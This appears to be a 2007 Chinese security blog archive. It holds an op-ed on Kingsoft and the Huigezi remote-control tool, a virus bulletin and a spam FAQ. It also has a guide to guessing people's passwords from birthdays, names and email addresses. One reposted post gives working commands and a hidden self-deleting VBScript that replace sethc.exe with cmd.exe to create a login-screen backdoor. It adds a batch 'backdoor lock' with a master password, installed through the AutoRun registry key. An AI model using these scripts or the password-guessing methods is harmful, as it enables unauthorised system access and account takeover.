文章列表

2007-12-03的存档

最近金山很红,借助熊猫烧后的余香和灰鸽子新溅的鲜血,疲软的金山仿佛瞬间坚挺。  拿一只老鸽子开练就能让金山的大旗迎风招展么?

  口水仗,是反病毒业界的一道风景,从江民瑞星持久的摩擦,到“奇雅二虎”夺人眼球的对骂,现在口水的风光转到北京的金山上。

  其实,口水由来已久,有哥们曾言道,自从《水浒》里潘大美女无意将拄窗棍不小心落在西门大官人头上,就产生了口水。

  尽管都是口水,效果各有不同,江民瑞星等已被口水仗搞得疲惫,停战良久,西门官人虽然泡得mm,却性命不长。唯有本次金山,虽然没靠口水帮助用户淹死病毒,却靠口水让自己红透半边天,这是怎么回事?是大难临头的英雄救世?还是超级设计的自我炒作?值得深思。不过金山用灰鸽子的鲜血染红自己顶戴的手法,的确值得玩味。

  导火线:雷军报猛料

  镜头回放,3月14日,金山总裁雷军的一段话拉开了口水仗的序幕,“灰鸽子已不再是一个单纯的病毒,其背后是一条制造病毒、贩卖病毒、病毒培训为一体的黑色产业链,从某种意义上讲,灰鸽子的危害超出熊猫烧香10倍!”这则新闻配上“最危险的后门程序”、“正在大规模集中爆发”等标题,众多媒体的发布,一下子口水化成满天的雨,网络热闹了。

  平心而论,这次喧嚣情节并不曲折,感觉上就是一家反病毒厂商,发现一个新的病毒趋势,率先及时报警,然后以“斗士”形象接受崇拜的目光。金山迅速以自己重装盔甲死掐一只灰鸽子的形象,摆着poss占据了反病毒舆论舞台的中央,使得江民和瑞星两个大腕,有些落寞地退到聚光灯之外。

  那么灰鸽子究竟是何许东东,这对于我们看清楚这次事件是一个基础。简单说来,灰鸽子是国内一款较有名的后门远程控制程序,和其它病毒不同,它是有“组织”还有“公开身份”的,它的研发者在2003年初成立了灰鸽子工作室,而且据工作室的公告,该软件为“商业化的远程控制软件,主要提供给网吧、企业及个人用户进行电脑软件管理使用;灰鸽子软件已获得国家颁布的计算机软件著作权登记证书,受著作权法保护。”从功能上讲,灰鸽子比起前辈冰河、黑洞等同类软件来,可以说有过之而无不及,其丰富而强大的功能、灵活多变的操作、良好的隐藏性使其他远程控制软件都相形见绌,尤其客户端简易便捷的操作使刚入门的初学者都能充当黑客。

  那么说到这里,灰鸽子轮廓已经明朗,其前身是否清白不得而知,但大致也不是什么好鸟,但其开发者看到这种软件有正面的商业需求,2003年开始 “从良”,走向正当商业用途,但是因为这种软件本身的两面性和很多黑客基于其基础上改编出的各种变种病毒木马产生的危害,,于是,争议就此产生。那么,金山的种种言之凿凿的指责究竟有几分真假呢?

  口水仗:真实的谎言

  金山对灰鸽子砍杀,最要害的有五刀,一刀是雷军拉开本次事件帷幕的那段话;另外四刀是金山公开发表的对灰鸽子质问的四个问题。那么我们仔细分析一下,金山这五点指责的漏洞。

  首先雷军认为“灰鸽子的危害超出熊猫烧香10倍”和“正在大规模集中爆发”,记者采访国家计算机病毒应急处理中心张健主任,张健认为此说法欠严密,灰鸽子与熊猫烧香等病毒没有可比性,因为病毒是自我传播复制危害网络,而灰鸽子仅仅是黑客的一种远程控制工具,当黑客攻陷网站,他可以用灰鸽子也可以用别的工具来远程控制,所以不存在灰鸽子大规模爆发,只是目前黑客攻击行为在呈现增长趋势。同时,国内两大反毒巨头瑞星江民相继公开表示,“灰鸽子是一种出现好几年的常见病毒,从瑞星监测的数据看近3个月感染用户每个月下降20%-30%。”、“灰鸽子目前并没有大规模的爆发,广大用户无须惊慌。”由此可见,雷军之言,看似凝重确凿,其实忽悠和自我感觉的成分多了一些,至于“造毒、贩毒的黑色产业链”等话,不知金山是否查有实证,如有,建议金山赶快拨打 110;如果没有证据,却到处发布这样的消息,我们就真不知道该夸金山什么好了。

  其次,金山一问灰鸽子“为什么灰鸽子服务端要采用“进程隐藏”、“线程注入”、“重复加壳”等病毒/木马手段来隐藏自己,并且躲避反病毒软件的识别呢?”首先,“进程隐藏”等仅仅是一种对程序包装的一种技术,病毒可以用,正常的软件也可以用,至于与反病毒软件的矛盾,病毒与反病毒软件有矛盾,其实反病毒软件之间往往也相互排斥,难道反病毒软件也是病毒?病毒符合金山说的这两项特征,但是符合这项特征的就一定是病毒么?金山把充分条件和必要条件弄混了。

 金山二问灰鸽子“为什么自灰鸽子问世以来,数以十万计的用户上报灰鸽子样本,并强烈要求将“灰鸽子”做为木马/病毒处理?为什么全球各大著名反病毒厂商比如nod32、诺顿、卡巴斯基、金山、瑞星、江民等都将“灰鸽子”列为了木马/病毒?是善是恶,群众的眼睛永远是雪亮的。”既然群众的眼睛是雪亮的,那为什么现在群众们(包括用户和那几家比金山更牛的反毒厂商)的眼睛都不认为灰鸽子在“大规模集中爆发”,而偏偏金山头顶开了“天眼”发现真理呢?而实际上,那么多反病毒软件只是把灰鸽子的前身列为病毒,其正身之后鲜有此事了。  金山三问四问灰鸽子“为什么要提供各种“远程摄像头控制”等等功能,这是一个正常的远程控制软件所应该有的行为吗?”“一个合法的远程控制软件是否应该具备用户知情权呢?”说实话,金山可能真是搞游戏产业太投入,把安全的功课荒废太久了,作为一个资深的安全记者,必须给金山普及一下常识,功能和技术是没有好坏可分的,就像锋利的刀刃,既是劳动工具,也可以是行凶利器,看你怎么用,所以金山提到的这些功能,有实力的正规远程控制软件是完全能够提供满足用户需求的。其次,目前安全很多产品都是要求用户没有知情权的,不要说远程控制软件了,例如很多知名厂商推出的内网监控系统、互联网过滤系统、信息防泄漏系统等等,都是提供给企业网络,涉及到对网络终端用户的监控,以达到保护信息、审计数据之用,这都是要求产品能够做到对终端个人完全透明,具体如何使用,看购买用户单位自身如何去安排,或者是否想要自己的员工拥有知情权,这完全是用户自身的使用问题,而厂商提供的远程控制工具,能够做到让终端被控制用户完全透明,只是一个技术提供。

  正如市场售卖的菜刀,有人买来砍了人,我们不去逮捕那个行凶者,却一个劲谴责制造菜刀的厂家,还质问人家“砍人,难道是一个正常菜刀应该有的行为吗?”岂不荒谬!

  独角戏:精彩的炒作

  金山对灰鸽子的绞杀,游离在虚虚实实之间,但是通过以上的分析,我们完全看不出它是类似其它反病毒厂商的正常的病毒播报行为,唯一的结论,就是炒作自己。

  作为在国内反病毒市场一直落后于瑞星、江民两大品牌厂商的金山,反病毒产品就一直是它的一块鸡肋,面对市场的压力和一直以来江民瑞星占据的舆论中心现状,金山压抑了很久。所以,借助机会炒作自己,是很自然的想法。

  为什么不选择其它的炒作机会?反病毒厂商一直以来传统炒作方式主要三种,一是新产品新技术的宣传,例如以前的主动防御或者反间谍等;二是竞争对手之间口水仗,江民、瑞星、卡巴斯基都是前段时间的主角;三是抢先截获发现新病毒,向媒体播报,《中国信息安全》杂志就经常收到瑞星、江民及几家国外厂商的新病毒预报新闻,却从未见金山有任何“先见之毒”。作为中国反病毒业界老人的金山,不走寻常路是有原因的,就是实力问题。新技术落后于人,再宣传就没有新闻价值;与竞争对手不敢直接pk,否则以卵击石,引火烧身;也很少截获新病毒,肚里没货,也无从讲起。所以,金山要宣传必须独辟蹊径。

  有人说,成功者之所以成功,不在于能力有多大,而在于选对了战场。金山此次炒作无疑是选对了战场,尽管构思不是很复杂,设计也不是很奇巧,几乎没有什么炒作的痕迹,但它的确做的比较成功,成功机关就在于选对了攻击对象、作战时机和巧妙的新闻由头。首先选择灰鸽子开刀,这是有道理的,因为一是灰鸽子在业内够名气,不是无名鼠辈;二是灰鸽子有实体单位,可以找到开炮方向,同时该工作室背景不大,金山认为能够惹得起,可以搞的定;其次选准时机,正好在熊猫烧香大灾之后,足够的眼球和点击率在持续关注着相关报道,如果再辅以“比熊猫烧香厉害10倍”之类的挑逗话语,眼球想不过来都难了。最后还是雷总导火线烧得好,开篇就发出“熊猫烧香”、“黑色产业链”、“最危险”、“将大规模集中爆发”等异常刺激的关键词,在网民们刚刚被熊猫烧香蹂躏过的脆弱的神经上碾过,于是引得无数媒体和无数网民“竞折腰”热烈关注此事。毕竟对于灾难,人们还是宁可信其有不可信其无的,何况刚刚经历过的熊猫之灾呢。于是,成功的一次炒作大戏开播了。

  宣传本没错,策划需要奇巧,但是最烦那种借普济众生之名,行中饱私囊之实,尤其结论还是靠一些模棱两可的假话来得出结论的“忽悠”闹剧。

  如果灰鸽子是真小人,那金山就是伪君子。

  送给金山一句我喜欢的评论人李承鹏的话共勉:“即使不能说真话,也尽量避免去说假话;即使因这个操蛋的时代被迫说了点假话,也不要给假话套上装逼的理由!”

  灰鸽子或许不太清白,但不是禽流感,拜托金山,别制造紧张,就算你把水搅浑,你也未必能摸到你想要的鱼。

(完)

推荐(0)
收藏

黑客破解不可避免要破解密码,本文不从破解技术入手,而从黑客技巧入手分析密码心理学。本文完全不涉及到具体的技术,完全是心理学、信息学内容。本来也懒得写,因为这是一个很大的内容,自己想到只是一点而已,我的见解简直是井底蛙看到的天空。

 

不过几个月前心血来潮写了提纲,也就对着提纲详细写下来,没有再花太多心思思考,见谅。

 

密码心理学就是从用户的心理入手,分析对方心理,从而更快的破解出密码。掌握好可以快速破解、缩短破解时间,获得用户信息,这里说的破解都只是在指黑客破解密码,而不是软件的注册破解。

 

分析一下,主要考虑下面的心理原则:

 

一、对中国人来说,一般都没有英文名的习惯,好像我就没有英文名,所以中文拼音很多人用来做密码,一般人去论坛什么对方注册一个用户名,由于一般简称很容易给人家抢了,所以一般也就是用全称。好像我的cyh是简称一般给人家注册了, caiyihao就很少人用。这里说的是名,如果是密码,一般要倒过来考虑,一般是先从简称再全称,理由很简单:短,输入时间快。

 

二、数字也是用得很多的,我想用得最多的密码是:123,123456(因为一般我们的习惯是六位数字,包括银行的存折都是六位,论坛一般最低要求六位,注意这点),试一下qq的密码,其实不少人是这样的。特别是新手。一般人密码是三位或者是六位。下面一些也是常用的:1,11,111,123,168,1314,520(特殊意义的数字),……

 

三、生日用得特别多,有人把存折和身份证放一起丢了,给盗贼用他的生日拿到了钱。这个是由于人们怕忘记,而自己的生日是不会忘记的,所以就用了的原因。由于上面说到的六位,所以刚刚好可以这样790102,在用户看来刚好省事,不知道:最方便就是最危险。一般人用是这样的习惯:六位就是790102,四位是7912。如果那个月和日是只有一位的,也就是1~9,一般人就是用四位的,如: 7632,而不是760302,如果日期是双位的,10~31,一般人也就是用到六位而不会是五位,如:760321而不是76321。如果月是双位,一般日就是双位的,如:761203,而一般不是76123。说得够罗索了吧,呵呵,总体来说也就是月和日都是同样位数的。因为这样比较美观。也有人不用日,只用到月,如:763,而对中国人来说7603用得少,因为看起来0是多余的。

 

四、我想:一个做暴力破解机软件的人,只要他思考过,而且技术上能达到的话,一般破解应该按照这个顺序来:数字→字母→特殊符号。对方用户名一般不用大写字,都是小写的多。例如我就是用cyh比cyh多,而且用caiyihao而从来不用caiyihao。密码就要考虑大小写。理论上也应该按照先小写再大写来。因为用户输入大写字一般人不是按shift键而是按caps lock键,所以理论上来说一般是要大写所有字母几个都大写。

 

五、做一个黑客就是要从细微入手分析用户的信息。电子邮箱入手的话可以知道一些什么呢?例如:

 

caiyihao@163.com可以知道一些什么呢?可以看出来是对方是用拼音的用户名,所以对方应该姓蔡。

 

cyh790101@163.com还可以知道一些什么呢?对方生日: 790101。当然也可以从主页看出来,例如:www.caiyihao.com,很明显的。还可以由一个人昵称推知名或者姓,例如我的qq昵称“浩”,很明显我的名有“浩”字,获得信息还有很多途径的,用得多是搜索引擎,建议最少用两个,搜可以用他的名搜,也可以用他的邮箱搜,也可以用他的文章搜等等。平时应该多一些常识,例如对方qq上写了“广东dg”,结合地理就应该知道是“广东东莞”。至于由对方聊天内容看出对方男女性别、大概多大、是否还读书、是否独生子女、在家里兄弟姐妹中排老大还是最小,这些就不是本文所要涉及的。

 

总之:细心观察;设身处地,从对方入手;动脑筋,“书是死的,人是活的”。用方法,可以不用工具就可以破解掉一些密码了。无心思细想,所以才只想到这么几点。见谅。

 

补:一般人的密码不会超过3个的,即使他有过很多个,最后也会缩小到2、3个的。而且一般人的所有邮箱密码都基本一样的,论坛注册的密码也都一样的,所以破解了一个也就可以得到很多个地方的密码了。

(完)

推荐(0)
收藏

探密Vista的EFS加密功能

http://hackbase.com/tech/2007%2D11%2D29/10753413675/

推荐(0)
收藏

后门原理:

转至:小章 blog http://blog.csdn.net/scz123/archive/2007/03/14/1528695.aspx

在windows 2000/xp/vista下,按shift键5次,可以打开粘置,会运行sethc.exe,而且,在登录界面里也可以打开。这就让人联想到WINDOWS的屏保,将程序替换成cmd.exe后,就可以打开shell了。

参考McafeeAvertLabs:
http://feeds.feedburner.com/~r/McafeeAvertLabsBlog/~3/101149799/

XP:
将安装源光盘弹出(或将硬盘上的安装目录改名)
cd %widnir%\system32\dllcache
ren sethc.exe *.ex~
cd %widnir%\system32
copy /y cmd.exe sethc.exe

VISTA:
takeown /f c:\windows\system32\sethc.exe
cacls c:\windows\system32\sethc.exe /G administrator:F
然后按XP方法替换文件

在登录界面按5此SHIFT,出来cmd shell,然后……

后门扩展:

转至:7j blog http://1v1.name/show-241-1.html#cm300

再更新一下 
Dim obj, success 
Set obj = CreateObject("WScript.Shell") 
success = obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exe", 0, True) 
success = obj.run("cmd /c echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F", 0, True) 
success = obj.run("cmd /c copy %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe", 0, True) 
success = obj.run("cmd /c copy %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe", 0, True) 
success = obj.run("cmd /c del %SystemRoot%\system32\sethc.exe", 0, True) 
success = obj.run("cmd /c ren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True) 

第二句最有意思了.嘿嘿..自动应答....以前就遇到过类似的问题

再更新.加个自删除,简化代码... 
On Error Resume Next 
Dim obj, success 
Set obj = CreateObject("WScript.Shell") 
success = obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exe&echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F&copy %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe&copy %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe&del %SystemRoot%\system32\sethc.exe&ren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True) 
CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName)

allyesno注:对付文件保护的办法还可以参照我的文章 cut wfp ’s jj easily 

https://www.xfocus.net/bbs/index.php?act=SE&f=2&t=58099&p=269293

后门锁扩展:

allyesno注:可以采用cmd 锁 来进行cmdshell的密码验证 嘿嘿。。。

用下面的后门锁的方法是 把代码保存为bdlock.bat

然后修改注册表位置即可

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor]
"AutoRun"="bdlock.bat"

@Echo Off
title 后门登陆验证
color a
cls
set temprandom=%RANDOM%
echo 请输入验证码:%temprandom%
set/p check=
if "%check%"=="%temprandom%%temprandom%" goto passcheck
if "%check%"=="%temprandom%" (
rem 后门服务器验证
rem 如果没有后门验证服务器请rem注释掉下一行代码
if exist \192.168.8.8\backdoor$\pass goto passcheck
)
echo 验证失败
pause
exit
:passcheck
echo 验证成功
If "%passcmdlock%"=="http://blog.csdn.net/freexploit/" Goto endx
Set passcmdlock=http://blog.csdn.net/freexploit/
:allyesno
Set Errorlevel=>nul
Echo 请输入验证密码?
Set password=allyesno Is a pig>nul
Set/p password=
rem 万能密码
if "%password%"=="allyesno is a sb" goto endx
If %time:~1,1%==0 Set timechange=a
If %time:~1,1%==1 Set timechange=b
If %time:~1,1%==2 Set timechange=c
If %time:~1,1%==3 Set timechange=d
If %time:~1,1%==4 Set timechange=e
If %time:~1,1%==5 Set timechange=f
If %time:~1,1%==6 Set timechange=g
If %time:~1,1%==7 Set timechange=h
If %time:~1,1%==8 Set timechange=i
If %time:~1,1%==9 Set timechange=j
set/a sum=%time:~1,1%+%time:~1,1%
Set password|findstr "^password=%timechange%%time:~1,1%%date:~8,2%%sum%$">nul 
If "%errorlevel%"=="0" cls&Echo 口令正确&Goto End
Echo 请联系瑞星客服咨询正确密码!&Goto allyesno
:End
Set password=>nul
Set Errorlevel=>nul
Echo

:endx

(完)

 

推荐(0)
收藏

11月12日,金山毒霸反病毒监测中心发布周(11.12-11.18)病毒预警,本周内广大用户需高度警惕“断网病毒下载器” (Win32.VirInstaller.Mudrop.fc.139264)木马。该木马运行后,会立即从网络上下载大量的病毒,并且试图关闭用户电脑内的杀毒软件。同时,它还发送大量的ARP欺骗数据干扰网络,造成用户中断,无法正常上网。

  金山毒霸反病毒专家戴光剑表示,此病毒为防止被安全软件删除,运行后马上搜索金山、卡巴斯基等安全软件的进程,一旦发现,便试图将其关闭,使用户的系统安全性大大降低。之后,病毒迅速连接至http://www.9*****3.com/e*****sto.txt这一地址,获得病毒列表,根据该文本文件里的病毒列表去下载更多病毒。

  据悉,该病毒会在本机4444端口创建一个后门,通过该端口进行ARP操作,干扰用户上网。而且,黑客也可通过该后门进行远程连接,获取用户系统内的信息。此外,该病毒还会搜索所有的非系统盘,感染所有以EXE为后缀的文件,造成用户无法正常使用被感染的EXE文件,给用户带来极大的损失。

  据金山毒霸反病毒监测中心报告显示,本周除“断网病毒下载器”可大量感染到用户电脑外,用户还需要警惕“系统侵蚀者” (Win32.Troj.AntiAV.e.172098)和“AUTO病毒17463”(Worm.AutoRun.c.17463) 。前者是一个破坏性极强的病毒,当病毒一运行后,桌面立即会消失,而且无法对系统做任何的操作,能看见的只是一个蓝色的桌面而已。该病毒破坏能力立杆见影,除了立即使桌面消失以外,当用户重启机器后,会发现同样只显示蓝色的桌面,此时寻找支控桌面的explorer.exe系统文件时,会发现该系统文件已经被病毒删除。当我们使用ctrl alt del热键显示出任务治理器时,通过浏览方式查看到“我的电脑”图标已经被删除,变成默认的图标,该病毒会给用户的心理和系统已经造成严重的影响;后者是一个AUTO病毒,病毒成功运行后会自删除,可以通过U盘传播,关闭部分杀毒软件以及修改系统时间,最终下载大量病毒在用户的机器上。

(完)

推荐(0)
收藏

1、什么是垃圾邮件?

  专家解答:根据中国互联网协会最新公布的定义,垃圾邮件包括收件人事先没有提出要求或者同意接收的广告、电子刊物、各种形式的宣传品的电子邮件等四种形式,具体描述如下:收件人事先没有提出要求或者同意接收的广告、电子刊物、各种形式的宣传品的电子邮件;收件人无法拒绝的电子邮件;隐藏发件人身份、地址、标题等信息的电子邮件;含有虚假信息源、发件人、路由等信息的电子邮件。

  2、垃圾邮件带来哪些安全问题?

  专家解答:垃圾邮件给互联网以及广大的使用者带来了很大的影响,这种影响不仅仅是人们需要花费时间来处理垃圾邮件、占用系统资源等,同时也带来了很多的安全问题。垃圾邮件占用了大量网络资源,这是显而易见的。一些邮件服务器因为安全性差,被作为垃圾邮件转发站,从而被警告、封IP等事件时有发生,大量消耗的网络资源使得正常的业务运作变得缓慢。随着国际上反垃圾邮件的发展,组织间黑名单共享,使得无辜服务器被更大范围屏蔽,这无疑会给正常用户的使用造成严重问题。垃圾邮件和黑客攻击、病毒等结合也越来越密切。随着垃圾邮件的演变,用恶意代码或者监视软件等来支持垃圾邮件已经明显地增加了。越来越具有欺骗性的病毒邮件,让很多企业深受其害,即便采取了很好的网络保护策略,依然很难避免,越来越多的安全事件都是因为邮件产生的,可能是病毒、木马或者其他恶意程序。

  3、有哪几种反垃圾邮件技术?

  专家解答:已经存在的和在被提及的反垃圾邮件方法试图来减少垃圾邮件问题和处理安全需求。通过正确的识别垃圾邮件,邮件病毒或者邮件攻击程序等都会减少。这些解决方法采取多种安全途径来努力阻止垃圾邮件。当前的反垃圾邮件技术可以分为4大类:过滤器、反向查询、挑战和密码术,这些解决办法都可以减少垃圾邮件问题,但是也有它们的局限性。现在很多反垃圾邮件方案所采用的都不会只是一种技术,而是多种多类技术的综合体。

(完)

推荐(0)
收藏